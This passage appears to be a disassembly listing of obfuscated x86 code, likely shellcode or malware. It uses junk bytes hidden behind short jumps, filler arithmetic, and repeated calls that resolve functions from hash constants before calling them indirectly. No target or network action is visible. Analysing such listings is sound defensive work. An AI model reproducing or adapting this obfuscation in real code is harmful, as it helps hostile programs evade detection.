seg000:00000BB9 mov eax, [ebp-270h] seg000:00000BBF dec esi seg000:00000BC0 push 0 seg000:00000BC2 dec edx seg000:00000BC3 jmp short loc_BC7 seg000:00000BC5 ; --------------------------------------------------------------------------- seg000:00000BC5 mov bh, 64h ; 'd' seg000:00000BC7 seg000:00000BC7 loc_BC7: ; CODE XREF: seg000:00000BC3j seg000:00000BC7 push 4 seg000:00000BC9 adc esi, 91h ; 'æ' seg000:00000BCF jmp short loc_BD3 seg000:00000BCF ; --------------------------------------------------------------------------- seg000:00000BD1 db 0ECh, 0EEh seg000:00000BD3 ; --------------------------------------------------------------------------- seg000:00000BD3 seg000:00000BD3 loc_BD3: ; CODE XREF: seg000:00000BCFj seg000:00000BD3 push ecx seg000:00000BD4 and [ebp-3A4h], edx seg000:00000BDA push eax seg000:00000BDB or ecx, 0B2h seg000:00000BE1 push dword ptr [ebp-350h] seg000:00000BE7 sbb eax, [ebp-68h] seg000:00000BEA jmp short loc_BEE seg000:00000BEA ; --------------------------------------------------------------------------- seg000:00000BEC db 0D9h, 0D5h seg000:00000BEE ; --------------------------------------------------------------------------- seg000:00000BEE seg000:00000BEE loc_BEE: ; CODE XREF: seg000:00000BEAj seg000:00000BEE push 0F3BB9845h seg000:00000BF3 call sub_19 seg000:00000BF8 push 0F0741Eh seg000:00000BFD push eax seg000:00000BFE call sub_108 seg000:00000C03 call eax seg000:00000C05 neg edx seg000:00000C07 pop eax seg000:00000C08 and dword ptr [ebp-60h], 0D0h seg000:00000C0F jmp short loc_C12 seg000:00000C0F ; --------------------------------------------------------------------------- seg000:00000C11 db 0E8h seg000:00000C12 ; --------------------------------------------------------------------------- seg000:00000C12 seg000:00000C12 loc_C12: ; CODE XREF: seg000:00000C0Fj seg000:00000C12 neg esi seg000:00000C14 push dword ptr [ebp-34Ch] seg000:00000C1A and ecx, [ebp-3B8h] seg000:00000C20 push 0F3BB9845h seg000:00000C25 call sub_19 seg000:00000C2A push 34B5A6AFh seg000:00000C2F push eax seg000:00000C30 call sub_108 seg000:00000C35 call eax seg000:00000C37 not edx seg000:00000C39 push 4000h seg000:00000C3E dec eax seg000:00000C3F push dword ptr [ebp-0Ch] seg000:00000C42 mov [ebp-40h], edx seg000:00000C45 push dword ptr [ebp-3B4h] seg000:00000C4B adc ebx, 0F7h ; '¸' seg000:00000C51 jmp short loc_C54 seg000:00000C51 ; --------------------------------------------------------------------------- seg000:00000C53 db 7Dh seg000:00000C54 ; --------------------------------------------------------------------------- seg000:00000C54 seg000:00000C54 loc_C54: ; CODE XREF: seg000:00000C51j seg000:00000C54 push 0F3BB9845h seg000:00000C59 call sub_19 seg000:00000C5E push 0A8308754h seg000:00000C63 push eax seg000:00000C64 call sub_108 seg000:00000C69 call eax seg000:00000C6B seg000:00000C6B loc_C6B: ; CODE XREF: seg000:000003BAj seg000:00000C6B ; seg000:00000618j seg000:00000C6B sbb ecx, [ebp-1Ch] seg000:00000C6E jmp short loc_C72 seg000:00000C6E ; --------------------------------------------------------------------------- seg000:00000C70 db 49h ; I seg000:00000C71 db 14h seg000:00000C72 ; --------------------------------------------------------------------------- seg000:00000C72 seg000:00000C72 loc_C72: ; CODE XREF: seg000:00000C6Ej seg000:00000C72 push 0 seg000:00000C74 not esi seg000:00000C76 push 0F3BB9845h seg000:00000C7B call sub_19 seg000:00000C80 push 0CE4C6283h seg000:00000C85 push eax seg000:00000C86 call sub_108 seg000:00000C8B call eax seg000:00000C8D xor ebx, edi seg000:00000C8F leave seg000:00000C90 retn seg000:00000C90 seg000 ends seg000:00000C90 seg000:00000C90 seg000:00000C90 end